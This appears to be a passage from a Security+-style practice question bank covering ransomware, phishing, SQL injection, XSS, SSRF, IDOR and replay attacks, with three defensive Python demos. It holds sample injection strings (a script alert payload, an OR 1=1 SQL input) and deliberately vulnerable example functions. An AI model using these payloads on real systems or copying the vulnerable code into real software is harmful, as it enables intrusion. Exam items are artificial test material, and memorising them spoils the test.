Option A is wrong because a SYN flood targets the TCP three-way handshake by sending many SYN packets without completing the handshake, exhausting server resources; it does not involve DNS responses or open resolvers. Option C is wrong because a replay attack involves capturing and retransmitting valid data transmissions (e.g., authentication tokens) to trick a system; it does not use DNS queries or bandwidth saturation.
Based on the exhibit, what type of malware is most likely present?
A. Ransomware, because the files are being renamed and recovery copies are being deleted.
B. Adware, because documents are no longer opening correctly.
C. Rootkit, because the system is using a command-line utility.
D. Spyware, because the attacker wants to read user documents.
Answer: A
The combination of shadow copy deletion, mass file renaming, and a ransom note is a strong match for ransomware. The attacker is attempting to prevent recovery while demanding payment or coercing the victim, which is exactly the pattern shown in the exhibit.
Why this answer
The exhibit shows files being renamed with a new extension and recovery copies (shadow copies) being deleted via vssadmin.exe. This is a classic ransomware behavior: encrypting user files and removing Volume Shadow Copy backups to prevent recovery without the attacker's key. Ransomware specifically targets document files and system restore points to maximize extortion leverage.
Exam trap
The trap here is that candidates see 'command-line utility' and think rootkit, but vssadmin deletion is a hallmark of ransomware, not a rootkit's stealth or persistence mechanism.
How to eliminate wrong answers
Option B is wrong because adware typically displays unwanted advertisements or redirects browser traffic, not renames files or deletes shadow copies; document opening issues here are a symptom of encryption, not adware. Option C is wrong because a rootkit hides its presence and provides privileged access, but using a command-line utility like vssadmin is a common ransomware action, not indicative of rootkit functionality. Option D is wrong because spyware covertly collects user data (keystrokes, browsing habits) without altering files; the attacker renaming and deleting backups points to encryption for ransom, not passive data theft.
A help desk technician receives an SMS claiming to be from the mobile carrier. The message says the user's corporate number will be suspended unless they open a link and confirm an MFA code. The user has not reported any account issues. What attack is this?
A. Spear phishing
B. Smishing
C. Vishing
D. Baiting
Answer: B
Smishing is phishing delivered through SMS, and the attacker is using urgency and a fake carrier notice to steal credentials or MFA codes.
Why this answer
Smishing is a phishing attack conducted via SMS (Short Message Service). The message impersonates the mobile carrier, creates urgency by threatening suspension, and lures the user to a malicious link to capture MFA codes or credentials. Since the attack vector is SMS, not email or voice, this is smishing.
Exam trap
The trap here is confusing the delivery method (SMS vs. email vs. voice) — candidates often pick 'spear phishing' because the message is personalized, but the defining characteristic is the SMS channel, which makes it smishing.
How to eliminate wrong answers
Option A is wrong because spear phishing is a targeted email-based attack that uses personalized information to trick a specific individual, not an SMS message. Option C is wrong because vishing (voice phishing) is conducted over phone calls, not text messages.
A support portal has a search field that accepts customer last names. After a tester enters a single quote, the application returns a database syntax error. Which attack is the tester most likely trying to verify?
A. Cross-site scripting (XSS)
B. SQL injection
C. CSRF
D. SSRF
Answer: B
SQL injection happens when user input is inserted into a database query without proper validation or parameterization. A single quote causing a syntax error is a common sign that the input is affecting the SQL statement.
Why this answer
The tester is most likely trying to verify a SQL injection vulnerability. Entering a single quote into a search field that interacts with a database can break the SQL query syntax if user input is improperly sanitized, causing the database to return a syntax error. This error indicates that the input is being directly concatenated into a SQL statement, confirming the presence of a SQL injection flaw.
Exam trap
The trap here is that candidates may confuse the database syntax error with a client-side script execution indicator, leading them to choose XSS, but the error is a direct result of SQL syntax breakage, not script injection.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting client-side scripts into web pages viewed by other users, and a database syntax error is not a typical indicator of XSS; XSS would manifest as script execution in the browser, not a backend database error. Option C is wrong because Cross-Site Request Forgery (CSRF) exploits the trust a site has in a user's browser by tricking the user into making unintended requests, and a single quote in a search field does not trigger a CSRF attack or produce a database syntax error. Option D is wrong because Server-Side Request Forgery (SSRF) involves manipulating the server to make requests to internal or external resources, and a database syntax error from a single quote is not related to SSRF; SSRF would typically involve URL manipulation or protocol-based attacks.
After an endpoint cleanup, an EDR agent shows inconsistent results: a suspicious process does not appear in normal task listings, a file in System32 is hidden from user-mode tools, and some security logs stop recording events at the same time. Which malware type best matches these symptoms?
A. Rootkit, because it hides processes, files, or activity from standard system tools.
B. Spyware, because it secretly collects user information and browser data.
C. Worm, because it spreads quickly through network shares and email attachments.
D. Trojan, because it masquerades as legitimate software to trick the user.
Answer: A
Rootkits are designed to conceal malware and attacker activity by altering how the operating system reports processes, files, or logs.
Why this answer
A rootkit is designed to hide its presence and the presence of associated processes, files, and system activities from standard operating system tools and user-mode APIs. The symptoms described—a process invisible to task listings, a hidden file in System32, and security logs ceasing to record events—are classic indicators of kernel-mode or user-mode rootkit behavior that intercepts system calls to filter out its own artifacts.
Exam trap
The trap here is that candidates confuse the 'hiding' behavior of a rootkit with the 'deception' of a trojan or the 'collection' of spyware, but only a rootkit specifically subverts the OS's own APIs to conceal its presence from standard administrative tools.
How to eliminate wrong answers
Option B is wrong because spyware focuses on covert data collection (e.g., keystrokes, browsing habits) and does not inherently hide processes, files, or disable security logging. Option C is wrong because a worm's primary characteristic is self-replication and network propagation, not stealth mechanisms to evade detection by task manager or hide files in System32. Option D is wrong because a trojan relies on social engineering to appear legitimate, but its core behavior does not include the systematic hiding of processes and files from system tools or the suppression of security event logs.
After installing a free PDF-to-Word utility from an unofficial website, a user's laptop starts sending data to an unknown server and the security agent is disabled. Which malware type best fits?
A. Trojan
B. Worm
C. Spyware
D. Rootkit
Answer: A
A trojan disguises itself as useful software while secretly installing malicious behavior.
Why this answer
A Trojan is malware disguised as legitimate software, such as a free PDF-to-Word utility, that performs malicious actions without the user's knowledge. In this scenario, the Trojan exfiltrates data to an unknown server and disables the security agent, which are classic Trojan behaviors—unlike self-replicating worms or passive spyware. The user's intentional download from an unofficial website is the typical infection vector for Trojans.
Exam trap
The trap here is that candidates may confuse 'spyware' with 'Trojan' because both can steal data, but the key distinction is that a Trojan actively performs multiple malicious actions (including disabling security) and requires user execution, whereas spyware is typically passive and does not disable defenses.
How to eliminate wrong answers
Option B (Worm) is wrong because worms self-replicate and spread across networks without user interaction, whereas this malware required the user to download and execute the utility. Option C (Spyware) is wrong because spyware primarily passively monitors and collects data without actively disabling security agents or performing destructive actions. Option D (Rootkit) is wrong because rootkits specifically hide their presence by modifying the operating system kernel or drivers, and while disabling a security agent could be a rootkit behavior, the initial infection vector (a downloaded utility) and data exfiltration are more characteristic of a Trojan.
Based on the exhibit, which attack is the developer most likely observing?
A. Cross-site scripting (XSS)
B. Server-side request forgery (SSRF)
C. SQL injection
D. CSRF
Answer: B
The application is being tricked into making a request to an internal metadata endpoint using a user-controlled URL parameter. That is server-side request forgery. SSRF is common in cloud environments because it can expose instance metadata, credentials, or internal services that should not be reachable from the outside.
Why this answer
The developer is most likely observing a server-side request forgery (SSRF) attack because the log shows the application making an outbound HTTP request to an internal IP address (10.0.0.1) initiated by user-supplied input (the 'url' parameter). SSRF occurs when an attacker manipulates the server to send crafted requests to internal or external resources, bypassing access controls. The exhibit's pattern of a server-side request to a private IP range directly indicates SSRF, not client-side or database attacks.
Exam trap
The trap here is that candidates confuse SSRF with CSRF because both involve requests, but SSRF is server-initiated while CSRF is client-initiated; the key clue is the server making a request to a private IP, not the user's browser.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not server-side requests to internal IPs; the log shows no script execution or client-side payload. Option C is wrong because SQL injection targets database queries via input fields, but the log shows an HTTP request to an internal IP, not a database error or query manipulation. Option D is wrong because CSRF (Cross-Site Request Forgery) tricks a user's browser into performing unintended actions on an authenticated site, whereas the exhibit shows the server itself making the request, not the client's browser.
A file-sharing portal uses a download URL like /download?file=12345. A tester changes the value to 12346 and can access another department's document without logging in again. Which control most directly prevents this issue?
A. Implement server-side authorization checks for every object request.
B. Make the identifier longer so users cannot guess nearby values.
C. Move the portal to HTTPS so request parameters cannot be intercepted.
D. Store the document name in a hidden field and validate it in JavaScript.
Answer: A
Server-side authorization ensures the application verifies that the current user is allowed to access the specific object requested. This directly stops insecure direct object reference issues because changing the identifier alone no longer grants access. The check must happen on the server for every request, not in the browser.
Why this answer
The issue is that the server trusts the file identifier in the URL without verifying that the authenticated user is authorized to access the requested resource. Implementing server-side authorization checks for every object request ensures that before serving any file, the server validates whether the current session or user has explicit permission to access that specific document. This directly prevents the IDOR (Insecure Direct Object Reference) vulnerability demonstrated by the tester.
Exam trap
The trap here is that candidates often confuse confidentiality controls (like HTTPS or longer identifiers) with authorization controls, failing to recognize that the core flaw is the lack of server-side permission verification for each object request.
How to eliminate wrong answers
Option B is wrong because making the identifier longer (e.g., using a UUID) only makes guessing harder but does not eliminate the authorization gap; if the server still trusts any identifier without checking permissions, a user who obtains or guesses a valid identifier can still access unauthorized documents. Option C is wrong because HTTPS encrypts the request in transit to prevent interception, but it does not address the server-side authorization flaw; the tester in this scenario is already authenticated and simply changes the parameter value in their own browser. Option D is wrong because storing the document name in a hidden field and validating it in JavaScript is client-side validation, which can be easily bypassed by disabling JavaScript or manipulating the hidden field value using browser developer tools; server-side authorization is required.
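The server-side check described above, as an added example that is not part of this question bank: a download handler that trusts only the session (the flawed pattern) next to one that also verifies the caller's permission on the requested object for every request. The document store, users, sessions and the department-based access rule are constructed stand-ins.

```python
"""Added example: server-side object authorization for a /download?file=ID handler.
Every record here is constructed sample data, not from a real portal."""
from dataclasses import dataclass
from typing import Optional, Tuple


@dataclass(frozen=True)
class Document:
    doc_id: int
    department: str
    name: str


@dataclass(frozen=True)
class User:
    username: str
    department: str


# Constructed store: two departments share one sequential ID space, so 12345 and
# 12346 are "nearby" values exactly as in the scenario.
DOCUMENTS = {
    12345: Document(12345, "finance", "q3-forecast.xlsx"),
    12346: Document(12346, "hr", "salary-bands.pdf"),
}
USERS = {"alice": User("alice", "finance"), "bob": User("bob", "hr")}
SESSIONS = {"sess-alice": "alice", "sess-bob": "bob"}  # session token -> username


def can_access(user: User, doc: Document) -> bool:
    """Authorization rule (assumed for the demo): a user may read only documents
    belonging to their own department. A real portal would consult ownership or
    an ACL; the point is that the rule is evaluated on the server per object."""
    return user.department == doc.department


def handle_download_vulnerable(session_token: Optional[str], file_id: int) -> Tuple[int, str]:
    """The IDOR pattern: authenticated? yes -> serve whatever ID was supplied."""
    if SESSIONS.get(session_token) is None:
        return 401, "authentication required"
    doc = DOCUMENTS.get(file_id)
    if doc is None:
        return 404, "not found"
    return 200, doc.name  # no check that this user may read this document


def handle_download(session_token: Optional[str], file_id: int) -> Tuple[int, str]:
    """The fix: authentication AND per-object authorization on every request,
    regardless of how the identifier was obtained or whether it was guessed."""
    username = SESSIONS.get(session_token)
    if username is None:
        return 401, "authentication required"
    doc = DOCUMENTS.get(file_id)
    if doc is None:
        return 404, "not found"
    if not can_access(USERS[username], doc):
        # Some designs return 404 here so an enumerating client cannot confirm
        # that the object exists; either way, log the denial for detection.
        return 403, "forbidden"
    return 200, doc.name


if __name__ == "__main__":
    # alice (finance) changes 12345 to the neighbouring HR document 12346
    print(handle_download_vulnerable("sess-alice", 12346))  # served: the flaw
    print(handle_download("sess-alice", 12346))             # (403, 'forbidden')
```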
An EDR alert shows a finance workstation launching rundll32 from %AppData%, creating a scheduled task, and making repeated HTTPS beacons to a rare domain. The user still has open accounting files, and the SOC wants to slow spread without losing evidence. What two actions should be taken first? Select two.
Select 2 answers
A. Isolate the workstation from the network using EDR or NAC containment.
B. Immediately wipe and reimage the workstation before collecting anything else.
C. Capture volatile evidence such as memory contents, running processes, and active network connections.
D. Power the workstation off immediately to stop the malware process.
E. Disable every user account in the finance department to prevent further compromise.
Answers: A, C
Isolating the host immediately stops most outbound command-and-control traffic and reduces the chance of lateral spread. It is the best first containment step when malware is still active. It preserves the system state better than power loss, which can destroy volatile evidence.
Why this answer
Isolating the workstation (A) stops the malware from communicating with its C2 server via HTTPS beacons and prevents lateral movement, while preserving the evidence on disk. Capturing volatile evidence (C) before any shutdown or isolation ensures that memory-resident artifacts, active network connections, and running processes are preserved, which are critical for forensic analysis and understanding the attack chain.
Exam trap
The trap here is that candidates may choose to power off the workstation (D) thinking it stops the malware, but this destroys volatile evidence and can trigger anti-forensic mechanisms, whereas isolation and memory capture are the correct first steps in incident response.
A customer enters `<script>alert('test')</script>` into a public forum signature field. Later, other users who view that signature see the script execute in their browsers. What attack is this?
A. SQL injection
B. Cross-site scripting
C. Session replay
D. Directory traversal
Answer: B
Cross-site scripting stores or reflects script code that executes in another user's browser.
Why this answer
This is a classic stored cross-site scripting (XSS) attack. The malicious script is injected into a persistent data store (the forum signature field) and later served to other users without proper sanitization, causing the browser to execute the script in the context of the trusted site.
Exam trap
The trap here is confusing client-side injection (XSS) with server-side injection (SQL injection) because both involve untrusted input, but XSS targets the browser's rendering engine while SQL injection targets the database query parser.
How to eliminate wrong answers
Option A is wrong because SQL injection targets database queries by manipulating input to alter SQL commands, not client-side script execution in a user's browser. Option C is wrong because session replay attacks involve capturing and reusing session tokens (e.g., via packet sniffing or XSS), not injecting scripts into a forum signature. Option D is wrong because directory traversal exploits file system paths to access restricted files (e.g., using '../' sequences), not injecting client-side code into web pages.
An employee receives an email that appears to come from payroll and asks them to open a link to "confirm direct deposit details". The link goes to a site with a slightly misspelled company name. What should the employee do first?
A. Click the link and sign in quickly before the account is locked
B. Reply to the email and ask payroll whether the message is real
C. Use the company's known payroll portal or help desk contact to verify the request
D. Forward the message to co-workers so they can compare it with similar emails
Answer: C
Verifying through a trusted, separate channel avoids the suspicious link and helps confirm whether the request is legitimate.
Why this answer
Option C is correct because the safest first step when receiving a suspicious email is to verify its legitimacy through a trusted, independent channel—such as the company's known payroll portal or the help desk. This avoids interacting with the potentially malicious link or sender, which could lead to credential theft or malware installation. The email exhibits classic phishing indicators: a spoofed sender, a request for sensitive action, and a URL with a misspelled domain.
Exam trap
The trap here is that candidates may think replying to the email (Option B) is a safe verification method, but in reality, it engages the attacker and confirms the email address as active, which is a common social engineering tactic.
How to eliminate wrong answers
Option A is wrong because clicking the link and signing in would directly submit credentials to a phishing site, compromising the employee's account. Option B is wrong because replying to the email confirms the employee's address as active and may reach the attacker, not the legitimate payroll department, increasing the risk of targeted follow-up attacks. Option D is wrong because forwarding the message to co-workers could spread the phishing attempt and potentially expose others to the same threat, violating security best practices that require reporting to the security team instead.
A help desk technician receives an email that appears to come from the payroll provider. The message says the employee's direct deposit will be suspended unless they verify their account through a link. What type of attack is this?
A. Phishing
B. Baiting
C. Vishing
D. Pretexting
Answer: A
Correct because the message uses a fake urgent request to steal credentials through a link. It impersonates a trusted organization and pressures the user to act quickly. That combination is a classic phishing pattern, even if the wording seems professional and the logo looks real.
Why this answer
This is a classic phishing attack because the email impersonates a trusted entity (the payroll provider) and uses social engineering to trick the recipient into clicking a malicious link. Phishing specifically involves fraudulent electronic communications, such as email, to deceive victims into revealing sensitive information or installing malware. The attack vector here is email-based, which aligns directly with the definition of phishing in the SY0-701 domain of threats and vulnerabilities.
Exam trap
The trap here is that candidates may confuse phishing with pretexting because both involve deception, but phishing is specifically electronic (email, SMS, or instant message), while pretexting relies on a fabricated story delivered through any medium, often requiring direct interaction.
How to eliminate wrong answers
Option B (Baiting) is wrong because baiting involves offering something enticing (e.g., a free USB drive or download) to lure a victim into a trap, not sending a deceptive email requesting verification. Option C (Vishing) is wrong because vishing uses voice communication (e.g., phone calls or VoIP) to extract information, not email. Option D (Pretexting) is wrong because pretexting involves fabricating a scenario or identity to gain trust and obtain information, often through direct interaction (e.g., a phone call or in-person), not through an unsolicited email with a link.
Based on the exhibit, which indicator should defenders prioritize for detecting future activity from this campaign?
A. The daily-changing domain names used by the campaign.
B. The executable file hash that remains constant across samples.
C. The TLS certificate fingerprint that remains constant across samples.
D. The changing user agent string seen on each host.
Answer: C
A stable TLS certificate fingerprint is a strong indicator because it can survive daily domain changes and still identify the same infrastructure or campaign. It is especially useful for network detection when other indicators rotate frequently, as shown in the exhibit.
Why this answer
Option C is correct because a TLS certificate fingerprint that remains constant across samples provides a stable, attacker-controlled indicator that is difficult for adversaries to change without incurring cost or operational friction. Unlike domain names or user agents, which can be rotated easily, TLS certificates require the attacker to generate or compromise a new private key and certificate, making the fingerprint a persistent and reliable detection signature for defenders.
Exam trap
The trap here is that candidates mistakenly prioritize easily changed artifacts like file hashes or domain names, overlooking the operational friction that makes TLS certificate fingerprints a more stable and attacker-resistant indicator.
How to eliminate wrong answers
Option A is wrong because daily-changing domain names are designed to evade domain-based blocklists and are inherently unstable as indicators; defenders would struggle to keep up with the rapid rotation. Option B is wrong because while an executable file hash may remain constant across samples, it can be trivially altered by recompiling or appending junk data to the binary, making it a weak long-term indicator. Option D is wrong because user agent strings are easily spoofed or randomized by the malware, and they often vary per host or session, providing no reliable consistency for detection.
Users on the same VLAN report that their browser occasionally reaches a fake internal portal, and packet captures show one host sending forged ARP replies that claim to be the default gateway. Traffic from nearby systems begins flowing through that host. Which attack is occurring?
ARP spoofing, also called ARP poisoning, uses false ARP messages to bind the attacker's MAC address to the gateway IP address and redirect local traffic.
Why this answer
B is correct because the scenario describes ARP spoofing (also known as ARP poisoning). The attacker sends forged ARP replies to associate their MAC address with the default gateway's IP address, causing traffic from other hosts on the same VLAN to be redirected through the attacker's machine. This allows the attacker to intercept, modify, or redirect traffic to a fake internal portal, which is a classic man-in-the-middle (MITM) attack leveraging the stateless nature of ARP.
Exam trap
The trap here is that candidates confuse ARP spoofing with DNS poisoning because both can redirect traffic to a fake portal, but the key differentiator is the protocol layer: ARP operates at Layer 2 (MAC address manipulation) while DNS operates at Layer 7 (name resolution).
How to eliminate wrong answers
Option A is wrong because DNS poisoning involves corrupting DNS resolver caches or zone data to redirect domain names to malicious IPs, but the packet captures show forged ARP replies, not DNS queries or responses. Option C is wrong because MAC flooding overwhelms a switch's CAM table with fake MAC addresses to force it into fail-open mode (hub-like behavior), but the attack here is targeted and uses spoofed ARP replies, not flooding. Option D is wrong because a SYN flood is a denial-of-service (DoS) attack that exhausts server resources by sending incomplete TCP handshake requests; it does not involve ARP manipulation or traffic redirection.
An accounts payable specialist receives a reply inside an existing vendor email thread. The message uses the real invoice number, matches the vendor's usual tone, and asks the specialist to change payment instructions to a new bank account before the end of the day. The vendor later confirms its mailbox was compromised. What type of attack is most likely?
A. Spear phishing, because the attacker targeted one employee with a convincing message.
B. Business email compromise through conversation hijacking, because the attacker used a compromised mailbox to alter a trusted thread.
C. Baiting, because the attacker tried to tempt the user with urgency and financial pressure.
D. Vishing, because the attacker is trying to persuade the user to change banking details.
Answer: B
This is best described as business email compromise via conversation hijacking. The attacker did not just spoof a sender; they gained access to a real vendor mailbox and inserted fraudulent payment instructions into an existing thread. That makes the message much more believable, often bypassing simple awareness checks. The key clues are the real invoice number, familiar tone, and later confirmation of mailbox compromise.
Why this answer
This is a business email compromise (BEC) attack specifically using conversation hijacking. The attacker gained access to the vendor's legitimate email account and inserted a fraudulent reply into an existing, trusted email thread, leveraging the compromised mailbox to bypass the specialist's suspicion. This differs from standard spear phishing because the attacker did not craft a new email from a spoofed address but instead hijacked an ongoing, authenticated conversation.
Exam trap
CompTIA often tests the distinction between spear phishing (a crafted email from a fake sender) and BEC conversation hijacking (using a compromised legitimate account to reply within an existing thread), where candidates mistakenly choose spear phishing because they focus on the targeted nature of the attack rather than the method of compromise.
How to eliminate wrong answers
Option A is wrong because spear phishing involves sending a crafted email from a spoofed or lookalike domain to a specific target, not hijacking an existing thread from a compromised legitimate mailbox. Option C is wrong because baiting relies on offering something enticing (e.g., a free USB drive) to trick the user, not on urgency or financial pressure within a compromised email thread. Option D is wrong because vishing (voice phishing) uses phone calls or voice messages to deceive the target, not email-based manipulation of a trusted conversation.
A scan reports a critical remote code execution vulnerability on an internet-facing VPN appliance with public proof-of-concept exploit code available. It also reports a critical local privilege escalation on an isolated lab workstation. Patch windows are limited this week. Which should be remediated first?
A. The internet-facing VPN appliance because it has higher exposure and exploitability.
B. The isolated lab workstation because all critical findings must be patched in numerical order.
C. The internal printer because peripheral devices are often overlooked and therefore most dangerous.
D. The lab workstation because local privilege escalation is always more dangerous than remote code execution.
Answer: A
An externally reachable device with a known exploit and remote code execution risk presents a much larger immediate threat than an isolated lab workstation. Prioritization should consider exposure, exploit maturity, and business impact, not severity score alone. Because the VPN appliance is publicly reachable, compromise could lead directly to remote access into the environment and broader organizational impact.
Why this answer
The internet-facing VPN appliance presents a higher risk because it is exposed to the public internet and has a known remote code execution vulnerability with public exploit code. This combination of high exposure (attack surface) and high exploitability (availability of proof-of-concept code) significantly increases the likelihood of a successful attack, making it the priority for remediation despite limited patch windows.
Exam trap
The trap here is that candidates may assume all critical vulnerabilities are equal and must be patched in order of severity score, ignoring the critical factor of asset exposure and the presence of public exploit code, which dramatically increases the real-world risk.
How to eliminate wrong answers
Option B is wrong because patching in numerical order is not a valid security prioritization method; risk-based prioritization (e.g., CVSS score combined with environmental factors like exposure) is the correct approach. Option C is wrong because the internal printer is not mentioned in the scan report, and introducing an unlisted asset distracts from the actual findings; peripheral devices are not inherently more dangerous than a critical RCE on an internet-facing system. Option D is wrong because local privilege escalation is not always more dangerous than remote code execution; RCE on an internet-facing device allows an attacker to gain initial access from anywhere, while local privilege escalation requires existing access to the isolated lab workstation, which is already low risk due to network isolation.
A developer reports that a search field returns all customer records when they enter a single quote followed by OR 1=1. Security confirms the web app concatenates user input directly into SQL statements. Which remediation is best?
A. Deploy only a web application firewall and keep the code unchanged.
B. Use parameterized queries or prepared statements in the application code.
C. Store the database password as a salted hash in the application configuration.
D. Disable HTTPS so the request body is easier to inspect by network tools.
Answer: B
Parameterized queries separate code from user-supplied data, which prevents injected input from being interpreted as SQL instructions. That directly addresses the flaw described in the scenario and is the most reliable long-term fix. It also scales better than trying to block every malicious pattern with filtering or a perimeter tool. In secure development, fixing the query construction is preferred because it removes the root cause instead of only reducing symptoms at the edge.
Why this answer
Option B is correct because parameterized queries or prepared statements separate SQL logic from user input, preventing the concatenation that allows SQL injection. By using placeholders (e.g., `?` or `:param`) and binding user input as data, the database engine treats the single quote and `OR 1=1` as literal string values, not executable SQL code. This directly remediates the root cause—dynamic SQL construction—without relying on external filters or insecure workarounds.
Exam trap
The trap here is that candidates may think a WAF (Option A) is sufficient because it blocks common payloads like `' OR 1=1`, but the exam emphasizes that security must be implemented at the code level, not just at the network perimeter.
How to eliminate wrong answers
Option A is wrong because a web application firewall (WAF) only filters known attack patterns and can be bypassed with obfuscation or novel payloads; it does not fix the insecure code, leaving the application vulnerable to SQL injection variants. Option C is wrong because storing the database password as a salted hash in the configuration is irrelevant—passwords are used for authentication, not for preventing SQL injection, and hashing a password would make it unusable for database login. Option D is wrong because disabling HTTPS exposes the entire request body in plaintext, increasing the risk of eavesdropping and session hijacking, and does nothing to prevent SQL injection.
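The two SQL-injection questions above (the single quote that breaks the statement, and the `OR 1=1` input that returns every record) and the parameterized fix, as one added example that is not part of this question bank. It runs against an in-memory SQLite database with constructed rows; the concatenated query reproduces the symptom and the placeholder version shows the same inputs handled as plain data.

```python
"""Added example: concatenated SQL (the flaw) beside a parameterized query (the fix).
Database, table and rows are constructed for the demo; SQLite is assumed."""
import sqlite3
from typing import Callable, List, Tuple

# Constructed sample data for a customers table.
SAMPLE_ROWS = [
    (1, "Alvarez", "alvarez@example.com"),
    (2, "Brennan", "brennan@example.com"),
    (3, "Chen", "chen@example.com"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customers (id INTEGER, last_name TEXT, email TEXT)")
    conn.executemany("INSERT INTO customers VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def search_vulnerable(conn: sqlite3.Connection, last_name: str) -> List[Tuple[int, str]]:
    """The flawed pattern: user input concatenated into the SQL text, so a single
    quote in the input becomes part of the statement's syntax."""
    sql = "SELECT id, last_name FROM customers WHERE last_name = '" + last_name + "'"
    return conn.execute(sql).fetchall()


def search_parameterized(conn: sqlite3.Connection, last_name: str) -> List[Tuple[int, str]]:
    """The fix: a placeholder carries the value to the engine as data, never as SQL."""
    sql = "SELECT id, last_name FROM customers WHERE last_name = ?"
    return conn.execute(sql, (last_name,)).fetchall()


def probe(conn: sqlite3.Connection, search: Callable, value: str) -> str:
    """Summarize what a tester would observe for one input: an error or a row count."""
    try:
        rows = search(conn, value)
    except sqlite3.Error as exc:  # the backend syntax error the question describes
        return "syntax error: %s" % exc
    return "%d row(s)" % len(rows)


if __name__ == "__main__":
    conn = make_db()
    # A lone quote leaves the string literal unterminated in the concatenated query.
    # In the OR 1=1 probe the trailing "--" comments out the closing quote that
    # the code appends, which is why every row comes back.
    for value in ("Chen", "'", "' OR 1=1 --"):
        print("%-14r vulnerable: %-30s parameterized: %s" % (
            value, probe(conn, search_vulnerable, value),
            probe(conn, search_parameterized, value)))
```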
A VPN concentrator shows that an authentication request from a user was accepted twice, even though the user insists they approved only one login. Packet analysis reveals that the second successful attempt reused the same authentication blob and arrived shortly after the first. Which attack is the best fit?
A. Replay attack, because a captured valid authentication message was resent to gain access again.
B. ARP poisoning, because the attacker redirected traffic by altering local address resolution.
C. Phishing, because the user was tricked into entering credentials on a fake page.
D. Denial of service, because the attacker is overwhelming the VPN gateway with requests.
Answer: A
Replay attacks work by capturing a legitimate authentication message and submitting it later, often before it expires or is invalidated.
Why this answer
The scenario describes a captured authentication blob being reused to gain a second successful authentication. This is the hallmark of a replay attack, where an attacker intercepts a valid authentication message (e.g., a Kerberos TGT, RADIUS Access-Accept, or a VPN pre-shared key hash) and retransmits it to the VPN concentrator to impersonate the user. The VPN concentrator accepted the duplicate because it lacked proper replay protection mechanisms such as timestamps, sequence numbers, or one-time-use nonces.
Exam trap
The trap here is confusing a replay attack with a phishing attack, because both involve capturing authentication data, but replay attacks reuse the captured blob directly without tricking the user, while phishing requires the user to voluntarily submit credentials.
How to eliminate wrong answers
Option B is wrong because ARP poisoning involves manipulating ARP tables to redirect traffic on a local network, not reusing an authentication blob to bypass VPN authentication. Option C is wrong because phishing tricks a user into revealing credentials on a fake page, but here the attacker reused a captured authentication blob without needing the user's credentials. Option D is wrong because a denial of service attack aims to overwhelm the VPN gateway with requests to disrupt service, not to gain unauthorized access by replaying a single authentication message.
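The replay protection the explanation above names (timestamps and one-time nonces), as an added example that is not part of this question bank: a client builds an authentication blob bound by an HMAC, and a verifier accepts it once, then rejects the identical blob when it is resent. The shared key, message layout and 30-second freshness window are constructed for the demo; a real VPN would use its protocol's own fields.

```python
"""Added example: an authentication blob with timestamp + nonce under an HMAC,
and a server-side verifier that refuses a replayed copy. All values constructed."""
import hashlib
import hmac
import json
import secrets
import time
from typing import Dict

SHARED_KEY = b"constructed-demo-key"   # stand-in for a real credential
FRESHNESS_WINDOW = 30                  # seconds of tolerated clock skew

AUTH_FIELDS = ("user", "ts", "nonce")


def _mac(key: bytes, fields: dict) -> str:
    """Canonical serialization so client and server hash identical bytes."""
    msg = json.dumps(fields, sort_keys=True).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def make_auth_blob(user: str, key: bytes, now: float) -> dict:
    """Client side: bind identity, send time and a random one-time nonce."""
    body = {"user": user, "ts": int(now), "nonce": secrets.token_hex(16)}
    body["mac"] = _mac(key, body)
    return body


class Verifier:
    """Server side: check integrity, freshness, and single use of the nonce.
    Without the nonce cache a fresh-looking blob could be accepted twice."""

    def __init__(self, key: bytes):
        self.key = key
        self.seen: Dict[str, int] = {}   # nonce -> time after which it may be forgotten

    def accept(self, blob: dict, now: float) -> str:
        fields = {k: blob.get(k) for k in AUTH_FIELDS}
        if not hmac.compare_digest(_mac(self.key, fields), str(blob.get("mac", ""))):
            return "reject: bad mac"          # tampered or forged
        if abs(now - fields["ts"]) > FRESHNESS_WINDOW:
            return "reject: stale"            # outside the timestamp window
        # Forget nonces whose timestamps can no longer pass the freshness check,
        # so the cache stays bounded without reopening a replay gap.
        self.seen = {n: exp for n, exp in self.seen.items() if exp > now}
        if fields["nonce"] in self.seen:
            return "reject: replay"           # same blob seen before: the attack
        self.seen[fields["nonce"]] = fields["ts"] + 2 * FRESHNESS_WINDOW
        return "accept"


if __name__ == "__main__":
    verifier = Verifier(SHARED_KEY)
    t0 = time.time()
    blob = make_auth_blob("alice", SHARED_KEY, t0)
    print(verifier.accept(blob, t0 + 1))   # accept
    print(verifier.accept(blob, t0 + 5))   # reject: replay (blob resent shortly after)
```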
A SOC analyst reviews an EDR alert on a finance workstation. The alert shows powershell.exe launched with an encoded command, downloaded a payload into memory, and then spawned rundll32.exe. No new executable was written to disk, but the process later created a scheduled task for persistence. Which two findings most strongly support a fileless attack? Select two.
Select 2 answers
A. powershell.exe launched with an encoded command and executed the payload in memory
B. rundll32.exe was spawned by a script-based process during the attack chain
C. a new portable executable was written to the user's temporary folder before being run
D. the endpoint antivirus quarantined the payload after a signature match
E. a USB storage device was inserted shortly before the alert fired
Answers: A, B
Encoded PowerShell is a common fileless technique because the malicious instructions can be hidden inside a command line and run directly in memory. This reduces obvious disk artifacts and can bypass simple file-based detection. In a Security+ scenario, that combination strongly suggests living-off-the-land abuse rather than a traditional dropped executable.
Why this answer
Option A is correct because a PowerShell encoded command that downloads and runs a payload entirely in memory, with nothing written to disk, is the defining trait of fileless malware: the script host loads and executes the code directly, so file-based antivirus never has a binary to scan. Option B is also correct because rundll32.exe is a signed Windows binary that attackers abuse to run code handed to it (a living-off-the-land binary); when it is spawned by a script-based parent in the middle of this chain, with no new executable on disk, it is the second strong indicator that the attacker is reusing built-in tools rather than dropping their own. The scheduled task provides persistence, but it stores a command line rather than a file, so it does not contradict the fileless picture.
Exam trap
The trap here is that candidates may confuse fileless attacks with any attack that uses PowerShell or scripting, but the key distinction is the absence of writing any executable to disk, which is why options involving disk writes or signature-based quarantine are distractors.
A user's laptop suddenly starts renaming many files and showing a ransom note. The laptop is still connected to Wi-Fi. What is the best immediate action?
A.Reboot the laptop to stop the malicious process.
B.Disconnect the laptop from the network immediately.
C.Delete the ransom note and continue working.
D.Change the user's password and wait for more details.
AnswerB
This limits spread to shared systems and helps contain the suspected ransomware activity quickly.
Why this answer
